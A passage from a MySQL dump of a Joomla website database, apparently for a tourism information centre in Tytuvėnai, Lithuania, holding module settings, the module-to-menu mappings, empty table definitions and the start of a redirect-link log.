00:00:00',1,'mod_k2_comments',1,1,'{\"moduleclass_sfx\":\"\",\"module_usage\":\"0\",\"catfilter\":\"0\",\"comments_limit\":\"3\",\"comments_word_limit\":\"6\",\"commenterName\":\"0\",\"commentAvatar\":\"1\",\"commentAvatarWidthSelect\":\"custom\",\"commentAvatarWidth\":\"50\",\"commentDate\":\"1\",\"commentDateFormat\":\"absolute\",\"commentLink\":\"0\",\"itemTitle\":\"0\",\"itemCategory\":\"0\",\"feed\":\"0\",\"commenters_limit\":\"5\",\"commenterNameOrUsername\":\"1\",\"commenterAvatar\":\"1\",\"commenterAvatarWidthSelect\":\"custom\",\"commenterAvatarWidth\":\"50\",\"commenterLink\":\"1\",\"commenterCommentsCounter\":\"1\",\"commenterLatestComment\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(168,'Categories','','',11,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_k2_tools',1,1,'{\"moduleclass_sfx\":\"\",\"module_usage\":\"4\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"0\",\"authors_module_category\":\"0\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"0\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"0\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"0\",\"catfilter\":\"0\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"min_size\":\"75\",\"max_size\":\"300\",\"cloud_limit\":\"30\",\"cloud_category\":[\"0\"],\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(169,'Tag cloud','','',13,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_k2_tools',1,1,'{\"moduleclass_sfx\":\"\",\"module_usage\":\"7\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"0\",\"authors_module_category\":\"0\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"0\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"0\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"0\",\"catfilter\":\"0\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"min_size\":\"75\",\"max_size\":\"300\",\"cloud_limit\":\"30\",\"cloud_category\":[\"0\"],\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(170,'Upcoming events','','',16,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_k2_content',1,1,'{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Event\",\"source\":\"filter\",\"catfilter\":\"1\",\"category_id\":[\"2\"],\"getChildren\":\"0\",\"itemCount\":\"4\",\"itemsOrdering\":\"\",\"FeaturedItems\":\"1\",\"popularityRange\":\"\",\"videosOnly\":\"0\",\"item\":\"0\",\"itemTitle\":\"1\",\"itemAuthor\":\"0\",\"itemAuthorAvatar\":\"0\",\"itemAuthorAvatarWidthSelect\":\"custom\",\"itemAuthorAvatarWidth\":\"50\",\"userDescription\":\"0\",\"itemIntroText\":\"0\",\"itemIntroTextWordLimit\":\"6\",\"itemImage\":\"0\",\"itemImgSize\":\"Small\",\"itemVideo\":\"0\",\"itemVideoCaption\":\"0\",\"itemVideoCredits\":\"0\",\"itemAttachments\":\"0\",\"itemTags\":\"0\",\"itemCategory\":\"0\",\"itemDateCreated\":\"1\",\"itemHits\":\"0\",\"itemReadMore\":\"0\",\"itemExtraFields\":\"0\",\"itemCommentsCounter\":\"0\",\"feed\":\"0\",\"itemPreText\":\"\",\"itemCustomLink\":\"0\",\"itemCustomLinkTitle\":\"\",\"itemCustomLinkURL\":\"http:\\/\\/\",\"itemCustomLinkMenuItem\":\"\",\"K2Plugins\":\"1\",\"JPlugins\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(176,'Reach Us','','<p>2466 Brookside Drive Birmingham, AL 35291</p>\r\n<p>Tax: 555-377-0533</p>\r\n<p>Phone: 05-377-0533</p>\r\n<p>Email: <a href=\"#\">lbickley@teleworm.us</a></p>\r\n<p>Website:www.joomshaper.com</p>',6,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(183,'Banner feature','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-2.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(184,'banner about','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-3.jpg\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(185,'Banner contact us','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-4.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(186,'banner contact form','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-5.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(187,'banner gallery','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-6.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(188,'Banner event','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-7.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(189,'Banner courses','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-8.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(190,'Banner blog','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-9.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(191,'Banner jomsocial','','',1,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"images\\/university\\/page-banners\\/banner-5.png\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(192,'Facebook Like Button','','',4,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_facebooklike',1,0,'{\"autoDetectUrl\":\"1\",\"url\":\"\",\"action\":\"like\",\"loadAsWhat\":\"2\",\"showPictures\":\"true\",\"send\":\"1\",\"zindex\":\"0\",\"width\":\"100%\",\"height\":\"\",\"layout\":\"standard\",\"colorScheme\":\"light\",\"font\":\"arial\",\"moduleclass_sfx\":\"\",\"loadApi\":\"1\",\"httpsOrNot\":\"1\",\"language\":\"\",\"title\":\"\",\"type\":\"website\",\"image\":\"\",\"ogURL\":\"\",\"sitename\":\"\",\"OGdescription\":\"\",\"appID\":\"\"}',0,'*'),(195,'Facebook Like Button (2)','','',1,'social',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_facebooklike',1,1,'{\"autoDetectUrl\":\"1\",\"url\":\"\",\"action\":\"like\",\"loadAsWhat\":\"2\",\"showPictures\":\"true\",\"send\":\"1\",\"zindex\":\"0\",\"width\":\"100%\",\"height\":\"\",\"layout\":\"standard\",\"colorScheme\":\"light\",\"font\":\"arial\",\"moduleclass_sfx\":\"\",\"loadApi\":\"1\",\"httpsOrNot\":\"1\",\"language\":\"\",\"title\":\"\",\"type\":\"website\",\"image\":\"\",\"ogURL\":\"\",\"sitename\":\"\",\"OGdescription\":\"\",\"appID\":\"\"}',0,'*'),(197,'Drevužynė','','<div class=\"map\"><a href=\"http://www.drevuzyne.lt\" target=\"_blank\"><img src=\"images/stories/drevuzyne.jpg\" border=\"0\" alt=\"\" /></a></div>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(199,'GTranslate','','',1,'account',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_gtranslate',1,0,'{\"moduleclass_sfx\":\"\",\"look\":\"flags\",\"language\":\"lt\",\"pro_version\":\"0\",\"enterprise_version\":\"0\",\"flag_size\":\"24\",\"new_tab\":\"0\",\"analytics\":\"0\",\"show_af\":\"0\",\"show_sq\":\"0\",\"show_ar\":\"0\",\"show_hy\":\"0\",\"show_az\":\"0\",\"show_eu\":\"0\",\"show_be\":\"0\",\"show_bg\":\"0\",\"show_ca\":\"0\",\"show_zh-CN\":\"0\",\"show_zh-TW\":\"0\",\"show_hr\":\"0\",\"show_cs\":\"0\",\"show_da\":\"0\",\"show_nl\":\"0\",\"show_en\":\"2\",\"show_et\":\"0\",\"show_tl\":\"0\",\"show_fi\":\"0\",\"show_fr\":\"0\",\"show_gl\":\"0\",\"show_ka\":\"0\",\"show_de\":\"2\",\"show_el\":\"0\",\"show_ht\":\"0\",\"show_iw\":\"0\",\"show_hi\":\"0\",\"show_hu\":\"0\",\"show_is\":\"0\",\"show_id\":\"0\",\"show_ga\":\"0\",\"show_it\":\"0\",\"show_ja\":\"0\",\"show_ko\":\"0\",\"show_lv\":\"0\",\"show_lt\":\"1\",\"show_mk\":\"0\",\"show_ms\":\"0\",\"show_mt\":\"0\",\"show_no\":\"0\",\"show_fa\":\"0\",\"show_pl\":\"1\",\"show_pt\":\"0\",\"show_ro\":\"0\",\"show_ru\":\"1\",\"show_sr\":\"0\",\"show_sk\":\"0\",\"show_sl\":\"0\",\"show_es\":\"0\",\"show_sw\":\"0\",\"show_sv\":\"0\",\"show_th\":\"0\",\"show_tr\":\"0\",\"show_uk\":\"0\",\"show_ur\":\"0\",\"show_vi\":\"0\",\"show_cy\":\"0\",\"show_yi\":\"0\",\"show_bn\":\"0\",\"show_bs\":\"0\",\"show_ceb\":\"0\",\"show_eo\":\"0\",\"show_gu\":\"0\",\"show_ha\":\"0\",\"show_hmn\":\"0\",\"show_ig\":\"0\",\"show_jw\":\"0\",\"show_kn\":\"0\",\"show_km\":\"0\",\"show_lo\":\"0\",\"show_la\":\"0\",\"show_mi\":\"0\",\"show_mr\":\"0\",\"show_mn\":\"0\",\"show_ne\":\"0\",\"show_pa\":\"0\",\"show_so\":\"0\",\"show_ta\":\"0\",\"show_te\":\"0\",\"show_yo\":\"0\",\"show_zu\":\"0\",\"show_my\":\"0\",\"show_ny\":\"0\",\"show_kk\":\"0\",\"show_mg\":\"0\",\"show_ml\":\"0\",\"show_si\":\"0\",\"show_st\":\"0\",\"show_su\":\"0\",\"show_tg\":\"0\",\"show_uz\":\"0\",\"show_am\":\"0\",\"show_co\":\"0\",\"show_haw\":\"0\",\"show_ku\":\"0\",\"show_ky\":\"0\",\"show_ld\":\"0\",\"show_ps\":\"0\",\"show_sm\":\"0\",\"show_gd\":\"0\",\"show_sn\":\"0\",\"show_sd\":\"0\",\"show_fy\":\"0\",\"show_xh\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(201,'Menu','','',1,'mj_panel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(203,'Mobile - Proxy Position','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_mj_proxyposition',1,1,'{\"position\":\"account\",\"moduleclass_sfx\":\"\"}',0,'*'),(204,'Mobile - Mobile Switcher','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_mj_switcher',1,1,'',0,'*'),(205,'Mobile Switcher','','',2,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_mj_switcher',1,0,'{\"hide_on_pc\":\"1\",\"@spacer\":\"\",\"show_text\":\"\",\"show_choosen\":\"0\",\"auto_show\":\"0\",\"auto_text\":\"Auto-Detect Version\",\"mobile_show\":\"1\",\"mobile_text\":\"Mobile Version\",\"web_show\":\"1\",\"web_text\":\"Desktop Version\",\"moduleclass_sfx\":\"\"}',0,'*'),(206,'Mobile Switcher','','',1,'mj_footer2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_mj_switcher',1,0,'{\"hide_on_pc\":\"1\",\"@spacer\":\"\",\"show_text\":\"\",\"show_choosen\":\"0\",\"auto_show\":\"0\",\"auto_text\":\"Auto-Detect Version\",\"mobile_show\":\"1\",\"mobile_text\":\"Mobile Version\",\"web_show\":\"1\",\"web_text\":\"Desktop Version\",\"moduleclass_sfx\":\"\"}',0,'*'),(207,'Menu (2)','','',1,'mj_panel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(208,'asdas','','',1,'mj_panel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mobilemenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(209,'Mobile Menu','','',1,'mj_panel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_menu',1,1,'{\"menutype\":\"mobilemenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(212,'Kontaktai','','<p><span style=\"font-size: medium;\">Maironio g. 2a, 86486 Tytuvėnai</span></p>\r\n<p><span style=\"font-size: medium;\">Mob. tel. +370672 44199 (direktorė)</span></p>\r\n<p><span style=\"font-size: medium;\">Mob. tel. +370 675 58506 <br />(užsakymų priėmimas)</span></p>\r\n<p style=\"font-size: 12.16px;\"><span style=\"font-size: medium;\"><a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></span></p>\r\n<div><span style=\"font-size: medium;\"><strong>Darbo valandos</strong></span></div>\r\n<div><span style=\"font-size: medium;\">I-IV 8:00-17:00</span></div>\r\n<div><span style=\"font-size: medium;\">V     8:00 - 15:45</span></div>\r\n<div><span style=\"font-size: medium;\">VI-VII pagal išankstinį susitarimą</span></div>\r\n<div><span style=\"font-size: medium;\">Pietų pertrauka 12.00 - 12.45</span></div>\r\n<div><span style=\"font-size: medium;\"> </span></div>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*');
/*!40000 ALTER TABLE `xyhmu_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_modules_menu`
--

DROP TABLE IF EXISTS `xyhmu_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_modules_menu`
--

LOCK TABLES `xyhmu_modules_menu` WRITE;
/*!40000 ALTER TABLE `xyhmu_modules_menu` DISABLE KEYS */;
INSERT INTO `xyhmu_modules_menu` VALUES (2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(79,0),(86,0),(87,0),(88,105),(89,105),(90,105),(92,105),(93,105),(94,105),(96,105),(97,105),(98,105),(101,0),(107,0),(116,0),(117,101),(118,101),(144,0),(145,0),(147,101),(148,101),(149,101),(150,101),(151,0),(152,-101),(153,274),(153,298),(155,101),(159,101),(161,0),(166,220),(166,221),(167,222),(168,222),(169,222),(170,220),(171,101),(176,236),(178,142),(178,143),(178,144),(178,145),(178,146),(178,147),(178,148),(178,149),(178,150),(178,154),(178,155),(179,218),(180,221),(181,221),(182,221),(183,103),(183,104),(183,105),(183,123),(183,132),(183,133),(183,139),(183,140),(183,141),(184,102),(184,103),(184,104),(184,105),(184,106),(184,107),(184,108),(184,109),(184,110),(184,112),(184,113),(184,114),(184,115),(184,116),(184,117),(184,118),(184,120),(184,121),(184,123),(184,132),(184,133),(184,139),(184,140),(184,141),(184,142),(184,143),(184,144),(184,145),(184,146),(184,147),(184,148),(184,149),(184,150),(184,151),(184,152),(184,153),(184,154),(184,155),(184,156),(184,208),(184,209),(184,210),(184,211),(184,212),(184,213),(184,214),(184,215),(184,216),(184,217),(184,218),(184,220),(184,221),(184,222),(184,223),(184,224),(184,225),(184,226),(184,227),(184,228),(184,229),(184,230),(184,231),(184,232),(184,233),(184,234),(184,235),(184,236),(184,237),(184,238),(184,239),(184,240),(184,241),(184,242),(184,243),(184,244),(184,245),(184,246),(184,247),(184,248),(184,249),(184,250),(184,251),(184,252),(184,254),(184,255),(184,259),(184,274),(184,276),(184,277),(184,278),(184,279),(184,280),(184,281),(184,282),(184,283),(184,284),(184,285),(184,286),(184,287),(184,288),(184,289),(184,290),(184,291),(184,292),(184,293),(184,294),(184,295),(184,296),(184,297),(184,298),(185,217),(186,236),(187,218),(188,220),(189,221),(190,222),(191,176),(192,102),(192,103),(192,104),(192,105),(192,106),(192,107),(192,108),(192,109),(192,110),(192,112),(192,113),(192,114),(192,115),(192,116),(192,117),(192,118),(192,120),(192,121),(192,123),(192,132),(192,133),(192,139),(192,140),(192,141),(192,142),(192,143),(192,144),(192,145),(192,146),(192,147),(192,148),(192,149),(192,150),(192,151),(192,152),(192,153),(192,154),(192,155),(192,156),(192,208),(192,209),(192,210),(192,211),(192,212),(192,213),(192,214),(192,215),(192,216),(192,217),(192,218),(192,220),(192,221),(192,222),(192,223),(192,224),(192,225),(192,226),(192,227),(192,228),(192,229),(192,230),(192,231),(192,232),(192,233),(192,234),(192,235),(192,236),(192,237),(192,238),(192,239),(192,240),(192,241),(192,242),(192,243),(192,244),(192,245),(192,246),(192,247),(192,248),(192,249),(192,250),(192,251),(192,252),(192,254),(192,255),(192,259),(192,274),(192,276),(192,277),(192,278),(192,279),(192,280),(192,281),(192,282),(192,283),(192,284),(192,285),(192,286),(192,287),(192,288),(192,289),(192,290),(192,291),(192,292),(192,293),(192,294),(192,295),(192,296),(192,297),(192,298),(192,299),(193,259),(193,274),(193,276),(193,277),(193,278),(193,279),(193,280),(193,281),(193,282),(193,283),(193,284),(193,285),(193,286),(193,287),(193,288),(193,289),(193,290),(193,291),(193,292),(193,294),(193,295),(193,296),(193,297),(193,298),(194,-101),(195,101),(195,102),(195,103),(195,104),(195,105),(195,106),(195,107),(195,108),(195,109),(195,110),(195,112),(195,113),(195,114),(195,115),(195,116),(195,117),(195,118),(195,120),(195,121),(195,123),(195,132),(195,133),(195,139),(195,140),(195,141),(195,142),(195,143),(195,144),(195,145),(195,146),(195,147),(195,148),(195,149),(195,150),(195,151),(195,152),(195,153),(195,154),(195,155),(195,156),(195,208),(195,209),(195,210),(195,211),(195,212),(195,213),(195,214),(195,215),(195,216),(195,217),(195,218),(195,220),(195,221),(195,222),(195,223),(195,224),(195,225),(195,226),(195,227),(195,228),(195,229),(195,230),(195,231),(195,232),(195,233),(195,234),(195,235),(195,236),(195,237),(195,238),(195,239),(195,240),(195,241),(195,242),(195,243),(195,244),(195,245),(195,246),(195,247),(195,248),(195,249),(195,250),(195,251),(195,252),(195,254),(195,255),(195,259),(195,274),(195,276),(195,277),(195,278),(195,279),(195,280),(195,281),(195,282),(195,283),(195,284),(195,285),(195,286),(195,287),(195,288),(195,289),(195,290),(195,291),(195,292),(195,293),(195,294),(195,295),(195,296),(195,297),(195,298),(195,299),(197,279),(199,0),(200,0),(201,0),(202,0),(203,0),(205,0),(206,0),(207,0),(208,0),(209,0),(212,0);
/*!40000 ALTER TABLE `xyhmu_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_newsfeeds`
--

DROP TABLE IF EXISTS `xyhmu_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `link` varchar(200) NOT NULL DEFAULT '',
  `filename` varchar(200) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(10) unsigned NOT NULL DEFAULT '1',
  `cache_time` int(10) unsigned NOT NULL DEFAULT '3600',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_newsfeeds`
--

LOCK TABLES `xyhmu_newsfeeds` WRITE;
/*!40000 ALTER TABLE `xyhmu_newsfeeds` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_overrider`
--

DROP TABLE IF EXISTS `xyhmu_overrider`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_overrider` (
  `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `constant` varchar(255) NOT NULL,
  `string` text NOT NULL,
  `file` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_overrider`
--

LOCK TABLES `xyhmu_overrider` WRITE;
/*!40000 ALTER TABLE `xyhmu_overrider` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_overrider` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_redirect_links`
--

DROP TABLE IF EXISTS `xyhmu_redirect_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_redirect_links` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `old_url` varchar(255) NOT NULL,
  `new_url` varchar(255) NOT NULL,
  `referer` varchar(150) NOT NULL,
  `comment` varchar(255) NOT NULL,
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(4) NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_link_old` (`old_url`),
  KEY `idx_link_modifed` (`modified_date`)
) ENGINE=InnoDB AUTO_INCREMENT=6120 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_redirect_links`
--

LOCK TABLES `xyhmu_redirect_links` WRITE;
/*!40000 ALTER TABLE `xyhmu_redirect_links` DISABLE KEYS */;
INSERT INTO `xyhmu_redirect_links` VALUES (1,'http://new.disigma.lt/index.php/tytuvenu-festivalis','','http://new.disigma.lt/','',1,0,'2014-04-17 20:22:18','0000-00-00 00:00:00'),(2,'http://new.disigma.lt/index.php/component/content/?id=103&Itemid=82','','http://new.disigma.lt/index.php/apie-centra/viesieji-pirkimai','',2,0,'2014-04-27 11:40:29','0000-00-00 00:00:00'),(3,'http://infotytuvenai.lt/index.php/component/content/?id=103&Itemid=82','','','',22,0,'2014-04-29 09:10:47','0000-00-00 00:00:00'),(4,'http://infotytuvenai.lt/index.php/component/content/category/14-sample-data-article/demo/portfolio','','','',24,0,'2014-05-05 15:36:24','0000-00-00 00:00:00'),(5,'http://infotytuvenai.lt/index.php/component/content/category/11-sample-data-article/demo/short-code','','','',25,0,'2014-05-05 15:36:25','0000-00-00 00:00:00'),(6,'http://infotytuvenai.lt/index.php/component/content/category/13-sample-data-article/demo/features','','','',26,0,'2014-05-05 15:36:26','0000-00-00 00:00:00'),(7,'http://infotytuvenai.lt/index.php/component/content/category/43-apie-centra/general','','','',33,0,'2014-05-05 15:36:27','0000-00-00 